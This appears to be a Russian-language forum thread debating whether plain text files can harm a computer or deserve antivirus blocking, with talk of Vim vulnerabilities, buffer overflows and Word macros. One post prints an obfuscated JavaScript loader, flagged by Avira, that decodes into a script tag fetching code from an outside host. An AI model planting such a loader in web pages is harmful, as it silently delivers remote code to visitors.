Может ли текстовый файл быть заблокированным или навредить компьютеру
- Автор темы _Lexa98_
- Дата начала
- Сообщения
- 4,020
- Репутация
- 626
ну и немного юмора, для разрядки обстановки ;D
Добавлено:
Police
ни excel, ни access, и уж тем более, упаси господи, word текстовыми редакторами не являются. последнее, к слову говоря, помимо того, что является текстовым процессором, не предназначен для составления кода. покажи мне человека, который пишет код на ворде, и я первым кину в него булыжник. да, его можно использовать для чтения и записи обычных текстовых файлов в том числе, но в таком режиме макросы в нем работать не будут.
Добавлено:
dwerf [?]
Добавлено:
Сообщение автоматически объединено:
Police
ни excel, ни access, и уж тем более, упаси господи, word текстовыми редакторами не являются. последнее, к слову говоря, помимо того, что является текстовым процессором, не предназначен для составления кода. покажи мне человека, который пишет код на ворде, и я первым кину в него булыжник. да, его можно использовать для чтения и записи обычных текстовых файлов в том числе, но в таком режиме макросы в нем работать не будут.
Добавлено:
Сообщение автоматически объединено:
dwerf [?]
а что тут разбираться? википедия в помощь. про Word выше. Outlook - спасибо, посмеялся.
Kaster [?]
Извини, я правда не могу сказать известны ли мне уязвимые текстовые редакторы и вредоносные текстовые файлы, не зная что ты имеешь ввиду под текстовым редактором и текстовым файлом. Я бы прочитал напрямую мозга, но у мыслечитателя батарейка села.
OffTopic:
Во первых в ворде всё ещё есть макроредактор, во вторых в ворде иногда пишут работы по информатике приводя куски кода.
А вот и не попадёшь.
Во первых в ворде всё ещё есть макроредактор, во вторых в ворде иногда пишут работы по информатике приводя куски кода.
- Сообщения
- 4,020
- Репутация
- 626
dwerf [?]
я не имею в виду ничего такого, чего нельзя найти в википедии.
на Список текстовых редакторов
у меня в голове, конечно, куда меньший список, но раз уж ты настаиваешь, мое мнение не отличается от общепринятых. под текстовым файлом, файл для чтения содержимого человеком без форматирования.
в целом, я бы сказал, что твои усилия найти какие-то непонятные доводы во опровержение почти доходя до маразма заслуживают уважения и поощрения. но нет, не заслуживают.
Police [?]
боже мой
я не имею в виду ничего такого, чего нельзя найти в википедии.
на Список текстовых редакторов
у меня в голове, конечно, куда меньший список, но раз уж ты настаиваешь, мое мнение не отличается от общепринятых. под текстовым файлом, файл для чтения содержимого человеком без форматирования.
ну так, получается ты пишешь в макроредакторе, а не в ворде, т.к. этот редактор это отдельный продукт, который общий для всей линейки офиса.
и что? их даже запускают оттуда? и еще раз, для уточнения, ты хочешь сказать, что человек написал макровирус, запихнул его в вордовский файл, который содержит какие-то учебные материалы по программированию, и при его запуске у человека случается ка-бум? я оставлю это без комментария.
в целом, я бы сказал, что твои усилия найти какие-то непонятные доводы во опровержение почти доходя до маразма заслуживают уважения и поощрения. но нет, не заслуживают.
Police [?]
еще раз, причем тут данная тема? вордовский файл - это бинарный файл, в который помимо текста, можно впихнуть макросы, форматирование, картинки и прочее. причем тут это и блокирование исходного текста антивирусом?
Kaster, для не проблема найти чтонибудь в википедии. Меня правда интересует именно твоё мнение.
Вот ссылка на сообщение об уязвимости в текстовом редакторе из приведённого тобой списка.
Тоесть файл не содержит ни исходных кодов, ни каких либо спецсимволов. Нет я не слышал, чтобы подобные файлы причиняли вред компьютеру.
OffTopic:
Ты сказал, что бросишь булыжник в того, кто пишет код на ворде. Я хочу сказать, что ты не прав и что бывают случаи когда имеет смысл писать код на ворде. Ещё я хочу сказать, что бывают случаи, когда код пишут не для того, чтобы его запускать. Больше я не хочу сказать ничего. Это моё сообщение не имело ничего общего с компьютерными уязвимостями, поэтому я пометил его как оффтопик.
Я полагаю, ты меня не понял. Я не ищу доводы в опровержение чего либо. Я стараюсь понять, что ты спросил здесь и ответить.
- Сообщения
- 4,020
- Репутация
- 626
dwerf [?]
а) файл содержит расширение соответствующее тому или иному ЯП
б) если расширения нет, или оно неизвестно, пользователь знал, что это исходный код и что его нужно запускать редактором
в) и уж конечно файл не должен быть исполняемым.
dwerf
и так, резюмируя, ты
1. согласен, что текстовый файл с исходным кодом сам по себе может причинить во вред? принимая во внимание найденный тобой один случай уязвимости 2007 года и, который по всей видимости, уже исправлен.
2. считаешь ли ты, что блокировать антивирусом текстовые файлы с какими-то непонятными символами внутри, которые идут вперемешку с обычных исходным кодом необходимо?
мое мнение, что текстовый файл, который открывается текстовым редактором не может причинить вред компьютеру, и поэтому блокироваться антивирусом не должен, и я уверен что так оно и есть. если не считать тестового файла EICAR
хорошо. принято. могу только сказать, что текстовый редактор Vim наверное не входит даже в сотню (утрирую) популярных редакторов на Windows. да и тикету уже более 5 лет. интересно другое - для того, что этой уязвимостью действительно воспользоваться, нужно выполнить какие-то пока мне непонятные, но тем не менее некоторое количество операции. такие как "...опция "modelines" должна быть включена", "злоумышленник должен обманом заставить пользователя открыть злонамеренный файл.", и в особенности этот пункт "приложение, запущенное в sandbox, разрешает вызов функции "feedkeys()". то есть как я понял, сам редактор должен быть запущен в sandbox.
нет. я не это имел в виду. файл может содержать исходные коды, и даже спецсимволы. но, т.к. мы говорим об исходных кодах, должно выполняться
а) файл содержит расширение соответствующее тому или иному ЯП
б) если расширения нет, или оно неизвестно, пользователь знал, что это исходный код и что его нужно запускать редактором
в) и уж конечно файл не должен быть исполняемым.
да. я и сейчас готов это сделать. но имелось в виду, человек который пишет код, именно код, а не демонстрацию кода, иллюстрацию кода, или еще что бы там ни было. то есть сам код - чистый текст с инструкциями для интерпретатора или компилятора. в ворде. и я кину. в крайнем случае пошлю email с большим рисунком булыжника.
я все равно не понял - где этот смысл? как этот смысл перекликается с данной темой или моим вопросом про уязвимость текстового редактора? если я вижу doс (docx) файл, я первым делом понимаю что это вордовский файл а не код, даже если я знаю, что там есть куски. так же, я, потенциально, принимаю риск что там может быть макрос с зловредом. но, 1) как я уже говорил doc файл не текстовый файл, 2) по умолчанию макросы в word отключены, 3) разве любо мало-мальский приличный антивирус не детектирует макровирусы?
dwerf
и так, резюмируя, ты
1. согласен, что текстовый файл с исходным кодом сам по себе может причинить во вред? принимая во внимание найденный тобой один случай уязвимости 2007 года и, который по всей видимости, уже исправлен.
2. считаешь ли ты, что блокировать антивирусом текстовые файлы с какими-то непонятными символами внутри, которые идут вперемешку с обычных исходным кодом необходимо?
Kaster
ОК
ОК
OffTopic:
Видишь ли, под написанием кода я понимаю всего-лишь написание текста на каком-нибудь языке программирования. Я не вижу принципиальной разницы между написанием кода в scite, в ворде или на листке бумаги, так как по сути я всё время делаю одно и тоже - пишу текст на языке программирования. И я понятия не имел, что в твоём понимании можно писать "именно код" и "демонстрацию кода". Соответственно я не правильно понял твоё высказывание о булыжнике. Я согласен, что писать код в ворде для его последующей компиляции/интерпретации не удобно.
Этот смысл никак не перекликается с данной темой. Совсем. Это был комментарий к твоему высказыванию о булыжнике и только к нему.
Я согласен, что текстовый файл сам по себе (без активного участия пользователя) может принести вред. Исправление уязвимости 2007 года никак не страхует от возникновения новых уязвимостей или обнаружения старых в любой программе, влючая службы windows, которые могут обработать файл без участия пользователя. Я не в состоянии подсчитать вероятность этого и допускаю что она может быть мала.
Нет, за исключением случаев, когда какая либо часть содержимого файла входит в вирусную базу, либо когда эвристический анализ даёт положительный результат (например непонятные символы являются потенциально опасными машинными командами).
- Сообщения
- 4,020
- Репутация
- 626
dwerf [?]
опираясь на прогугленный тобой пример? в таком случае, непонятно, почему антивирусы до сих пор не блокируют текстовые файлы. надо полагать, до них еще не дошло, если есть чему доходить.
обработка файла и запуск исполняемого файла это разные вещи. какая служба запускает фрагменты текстового файла, которые в последствии могут оказаться инструкциями процессора без участия пользователя?
предположим в исходном коде, скажем test.au3, внутри, в комментариях есть ASCII символы, при перевода в бинарный код, которые являются машинным кодом исполняемого файла bad.exe, который наносит ущерб компьютеру. считаешь ли ты, что данный исходный код антивирус должен заблокировать? и каким образом находясь внутри текстового файла эти наборы символов могут принести вред? ведь именно это должно послужить причиной для блокировки.
Я уже писал про переполнение буфера. Если таковое случится, то фрагменты текстового файла могут оказаться инструкциями процессора. Если такое случиться со службой windows, то эти инструкции будут выполнены с привилегиями системы.
Kaster [?]
Возможно они полагаются на ничтожную вероятность наличия уязвимостей.
Возможно они считают, что фиксить баги программ должны их авторы, как это было с вимом в 2007.
Возможно они знают что-то, чего я не знаю.
Возможно они всё-таки блокируют текстовые файлы, если считают что от них исходит угроза.
Да.
1. переполнение буфера, при обработке файла другой программой
2. запуск злоумышленником заранее заготовленной бомбы
3. запуск скрипта невнимательным пользователем, если считать что при исполнении скрипта bad.exe запустится
- Сообщения
- 4,020
- Репутация
- 626
dwerf
ок, приведи пож-та пример текстового файла который вызывает переполнение буфера хоть у чего-нибудь. я уж не говорю, про системные службы.
dwerf [?]
ок, приведи пож-та пример текстового файла который вызывает переполнение буфера хоть у чего-нибудь. я уж не говорю, про системные службы.
dwerf [?]
приведи, пож-та, пример au3 файла с неким бинарным кодом, который антивирус (могу проверить только на авасте) посчитает угрожающим и заблокирует. файл должен содержать какой-то осмысленный текст, который хотя бы отдаленно будет напоминать AutoIt код, раз уж мы говорим про *.au3 иначе его блокировка может быть вполне правомерной, если в нем содержится исключительно бинарный код исполняемого файла - по сути это будет исполняемый файл с измененным расширением.
пож-та пример au3-скрипта, который переполняет буфер, ну скажем у SciTE.
не понял, что за бомба. но в любом случае, в расчет берет исключительно сам файл. никаких заготовок. иначе заготовить можно все что угодно.
невнимательного пользователя в расчет тоже не берем, т.к. подразумевается, что сам скрипт (с бинарником внутри) запускаться не будет. но даже если и так, разве антивирус не заблокирует bad.exe а не сам скрипт?
Kaster [?]
Моё мнение о антивирусах: они должны блокировать и скрипт и bad.exe.
Ну и у меня к тебе просьба: Раз ты так уверен в том что от текстовых файлов не может идти никакой опасности, то у тебя должны быть аргументы, которые доказывают это на 100%. Приведи пожалуйста эти аргументы. Среди них должно быть доказательство невозможности возникновения уязвимостей в службах windows.
С твоего позволения я сделаю это завтра. Мне через три часа вставать.
У меня нет данных по уязвимостям scite, я не в состоянии привести такой скипт.
Чтобы не было путаницы: я не знаю заблокирует какой-нибудь конкретный антивирус сам скрипт или только bad.exe.
Моё мнение о антивирусах: они должны блокировать и скрипт и bad.exe.
Ну и у меня к тебе просьба: Раз ты так уверен в том что от текстовых файлов не может идти никакой опасности, то у тебя должны быть аргументы, которые доказывают это на 100%. Приведи пожалуйста эти аргументы. Среди них должно быть доказательство невозможности возникновения уязвимостей в службах windows.
- Сообщения
- 4,020
- Репутация
- 626
dwerf [?]
ну, единственный мой аргумент - это опыт. за более чем 15 лет использования операционной системы Windows мне не попался ни один текстовый файл, который бы нанес вред моему компьютеру. именно текстовый, в общепринятым понимании этого слова. так же, ни один антивирус из мной использованных, а их было достаточно количество для составления статистики, ни разу не заблокировал ни один текстовый файл. но это следствие того, что за все время моего пользования компьютером, мне ни разу не попался текстовый файл, с какой-то скрытой угрозой в ней. были самые разные случае - старые браузеры запускали Javascript, какой-нибудь недобросовестный ActiveX, всякого рода хлам-страницы в интернете, нечаянный запуск зараженных файлов. но чтобы текстовый файл - ни разу. учитывая, что всякие хакеры и вирусописатели знают на порядок больше моего о системах, уязвимостях и прочих дырах в ней, то факт, что я ни разу с этим не сталкивался, учитывая, что сталкивался со многими другими видами, дополненный уже моими знаниями о системе дают мне основание думать, что такого факта нет.
как ты говорил ранее, если в программе есть уязвимость, то ей можно воспользоваться. но я ни разу не сталкивался с подобными уязвимостями в текстовых редакторах. гугл про них тоже молчал. уязвимости в системных службах инициированные текстовыми файлами (и только ими) тоже не очень плодотворный запрос в гугле. то есть, я на 100% не утверждаю. поэтому и говорю, если есть чем возразить приведи пож-та контрпример.
Добавлено:
да, забыл добавить, текстовые файлы, кроме bat файлов. потому что этот язык антивирусы знают и успешно блокируют.
я совершенно забыл про разницу во времени
подойдет любой другой редактор. можно взять тот же vim
ну я сказал про аваст, потому что он установлен. но я могу установить любой другой бесплатный или триальный антивирус на врем проверки, на твое усмотрение.
ну, единственный мой аргумент - это опыт. за более чем 15 лет использования операционной системы Windows мне не попался ни один текстовый файл, который бы нанес вред моему компьютеру. именно текстовый, в общепринятым понимании этого слова. так же, ни один антивирус из мной использованных, а их было достаточно количество для составления статистики, ни разу не заблокировал ни один текстовый файл. но это следствие того, что за все время моего пользования компьютером, мне ни разу не попался текстовый файл, с какой-то скрытой угрозой в ней. были самые разные случае - старые браузеры запускали Javascript, какой-нибудь недобросовестный ActiveX, всякого рода хлам-страницы в интернете, нечаянный запуск зараженных файлов. но чтобы текстовый файл - ни разу. учитывая, что всякие хакеры и вирусописатели знают на порядок больше моего о системах, уязвимостях и прочих дырах в ней, то факт, что я ни разу с этим не сталкивался, учитывая, что сталкивался со многими другими видами, дополненный уже моими знаниями о системе дают мне основание думать, что такого факта нет.
как ты говорил ранее, если в программе есть уязвимость, то ей можно воспользоваться. но я ни разу не сталкивался с подобными уязвимостями в текстовых редакторах. гугл про них тоже молчал. уязвимости в системных службах инициированные текстовыми файлами (и только ими) тоже не очень плодотворный запрос в гугле. то есть, я на 100% не утверждаю. поэтому и говорю, если есть чем возразить приведи пож-та контрпример.
Добавлено:
Сообщение автоматически объединено:
да, забыл добавить, текстовые файлы, кроме bat файлов. потому что этот язык антивирусы знают и успешно блокируют.
C2H5OH
AutoIT Гуру
- Сообщения
- 1,473
- Репутация
- 333
Kaster,
что-то ты скуп на аргументы.
Для того чтобы нанести вред, этот текстовый файл должен быть запущен на выполнение.
Все иные варианты - это работа другой программы, интерпритирующей этот текстовый файл.
Очевидно что любой антивирус рассматривает угрозу от текстового файла, как от файла, который может быть переименован в .exe и запущен на выполнение (или любой другой способ, предполагающий выполнение бинарного тела файла как программного кода).
Это кто из нас алкач? :beer:
- Сообщения
- 3,557
- Репутация
- 628
нашел кое что за 2009 год. из личного опыта
внизу сегодняшний скрин. за три года создатели авиры так и не внесли этот код в белый список .
согласен, почти не вирус. но негатив присутствует
внизу сегодняшний скрин. за три года создатели авиры так и не внесли этот код в белый список .
Код:
<script type="text/javascript" language="javascript">
<!--
function Nfg722(dYo262){document.write( String.fromCharCode(parseInt(dYo262)-3));}
var P212="63@118@102@117@108@115@119@35@111@100@113@"+
"106@120@100@106@104@64@42@109@100@121@100@118@102@"+
"117@108@115@119@42@35@119@124@115@104@64@42@119@104@"+
"123@119@50@109@100@121@100@118@102@117@108@115@119@"+
"42@35@118@117@102@64@42@107@119@119@115@61@50@50@111@"+
"104@107@100@52@60@59@51@49@114@110@114@118@107@104@"+
"102@107@110@100@49@113@104@119@50@115@121@105@86@91@"+
"58@52@54@53@50@66@118@108@103@64@58@57@53@60@42@65@"+
"63@50@118@102@117@108@115@119@65";var ZZ639=P212.split("@");
for(Jy376=0;Jy376<ZZ639.length;Jy376++){Nfg722(ZZ639[Jy376]);}
// -->
</script>
- Сообщения
- 1,590
- Репутация
- 341
Возвращаясь к разговору у вреде txt файла. Случайно наткнулся на оф. форуме на пост, который гласит:
Получается что любой файл переименовав в txt файл, можно запустить точно так же как и программу. Вот и весь вред.
Насчет сигнатуры - согласен, она должна быть в любом случае, но в любом случает txt файлы должны же проверяться
Получается что любой файл переименовав в txt файл, можно запустить точно так же как и программу. Вот и весь вред.
Насчет сигнатуры - согласен, она должна быть в любом случае, но в любом случает txt файлы должны же проверяться
